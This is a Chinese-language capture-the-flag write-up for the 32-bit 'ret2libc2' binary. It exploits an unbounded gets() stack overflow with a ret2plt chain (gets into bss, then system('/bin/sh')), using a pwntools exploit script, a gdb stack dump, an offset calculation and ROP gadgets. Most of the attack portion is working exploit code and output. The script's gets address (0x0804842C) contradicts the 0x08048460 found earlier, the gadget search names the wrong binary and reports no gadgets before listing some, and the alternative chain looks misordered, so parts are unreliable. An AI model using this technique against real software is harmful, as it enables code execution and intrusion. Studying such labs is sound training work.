一、题目
题目:ret2libc2
题目描述:返回地址更改为system@plt,再写入system@plt的虚假的返回地址,再写入system@plt的参数,但system@plt的参数/bin/sh由gets@plt写入
二、WriteUp
1 . checksec ret2libc2
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE ( 0x8048000)
2 .ida+F5
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("Something surprise here, but I don't think it will work.");
printf("What do you think ?");
gets(&s);
return 0;
}
functions windows --- 存在system函数
.plt:08048490 jmp ds:off_804A01C
.plt:08048490 _system endp
functions windows --- 存在gets函数
.plt:08048460 jmp ds:off_804A010
.plt:08048460 _gets endp
shift+F12 没有/bin/sh ,考虑写入/bin/sh
点击_bss_start 查看到bss段的buffer
.bss:0804A080 ; char buf2[ 100 ]
.bss:0804A080 buf2 db 64h dup( ?)
.bss:0804A080 _bss ends
首先调用gets函数用来写入到buf2中,然后再调用buf2的地址
elf = ELF( "./ret2libc2" )
elf. symbols( "buf2" )
elf. plt[ "system" ]
elf. plt[ "gets" ]
3 . ROPgadget --binary ret2libc1 --only "pop|ret"
无可用
4 . gdb ret2libc2
b main
run
vmmap
0xfffdd000 0xffffe000 rw-p 21000 0 [ stack] //栈区不可执行
00:0000│ esp 0xffffd110 —▸ 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
01:0004│ 0xffffd114 ◂— 0x0
02:0008│ 0xffffd118 ◂— 0x1
03:000c│ 0xffffd11c ◂— 0x0
.. . ↓ 3 skipped
07:001c│ eax 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
08:0020│ 0xffffd130 ◂— 'BBBBCCCCDDDD'
09:0024│ 0xffffd134 ◂— 'CCCCDDDD'
0a:0028│ 0xffffd138 ◂— 'DDDD'
0b:002c│ 0xffffd13c ◂— 0x0
0c:0030│ 0xffffd140 —▸ 0x8048500 ( _start) ◂— xor ebp, ebp
0d:0034│ 0xffffd144 —▸ 0xf7fc9550 ( __kernel_vsyscall) ◂— push ecx
0e:0038│ 0xffffd148 —▸ 0x8048034 ◂— push es
0f:003c│ 0xffffd14c —▸ 0xf7fa5a08 ( __exit_funcs_lock) ◂— 0x0
10 :0040│ 0xffffd150 ◂— 0x1
11 :0044│ 0xffffd154 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
12 :0048│ 0xffffd158 ◂— 0x0
13 :004c│ 0xffffd15c —▸ 0x8048425 ( _init+9) ◂— add ebx, 0x1bdb
14 :0050│ 0xffffd160 —▸ 0xf7fa43fc ( __exit_funcs) —▸ 0xf7fa5a20 ( initial) ◂— 0x0
15 :0054│ 0xffffd164 ◂— 0xffffffff
16 :0058│ 0xffffd168 —▸ 0x804a000 ( _GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 ( _DYNAMIC) ◂— 0x1
17 :005c│ 0xffffd16c —▸ 0x8048722 ( __libc_csu_init+82) ◂— add edi, 1
18 :0060│ 0xffffd170 ◂— 0x1
19 :0064│ 0xffffd174 —▸ 0xffffd244 —▸ 0xffffd3f0 ◂— '/home/uaoe/Desktop/ti/ROP/ret2libc2'
1a:0068│ 0xffffd178 —▸ 0xffffd24c —▸ 0xffffd414 ◂— 'SHELL=/usr/bin/zsh'
1b:006c│ 0xffffd17c —▸ 0xf7df0a15 ( __cxa_atexit+37) ◂— add esp, 0x1c
1c:0070│ 0xffffd180 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
1d:0074│ 0xffffd184 ◂— 0x0
1e:0078│ 0xffffd188 —▸ 0x80486db ( __libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│ 0xffffd18c ◂— 0x0
20 :0080│ 0xffffd190 ◂— 0x1
21 :0084│ 0xffffd194 —▸ 0x8048500 ( _start) ◂— xor ebp, ebp
22 :0088│ ebp 0xffffd198 ◂— 0x0
23 :008c│ 0xffffd19c —▸ 0xf7dd7905 ( __libc_start_main+229) ◂— add esp, 0x10
ebp地址 - eax地址 = 0xffffd198 - 0xffffd12c + 0x4 = 112 字节
或者执行plt去找到gets@plt和system@plt的值
0x8048460: gets@plt
0x8048490: system@plt
5 . payload
垃圾数据*112字节
gets地址 0x08048460
system地址 0x08048490
buf2地址 0x0804A080
/bin/sh的地址 0x0804A080
6 .exp.py
from pwn import *
io = process( "./ret2libc2" )
gets_plt = 0x0804842C
buf2_adr = 0x0804A080
system_plt = 0x08048490
payload = flat( [ b'A' * 112 , gets_plt, system_plt, buf2_adr, buf2_adr] )
io. sendline( payload)
io. sendline( "/bin/sh" )
io. interactive( )
7 .另一种payload
Gadgets information
0x080486ef : pop ebp ; ret
0x080486ec : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804841d : pop ebx ; ret
0x080486ee : pop edi ; pop ebp ; ret
0x080486ed : pop esi ; pop edi ; pop ebp ; ret
0x08048406 : ret
0x0804854e : ret 0xeac1
垃圾数据*112字节
gets地址 0x08048460
0x0804841d : pop ebx ; ret
buf2地址 0x0804A080
system返回地址 0x08048490
0x0804841d : pop ebx ; ret
/bin/sh的地址 0x0804A080
三、总结
无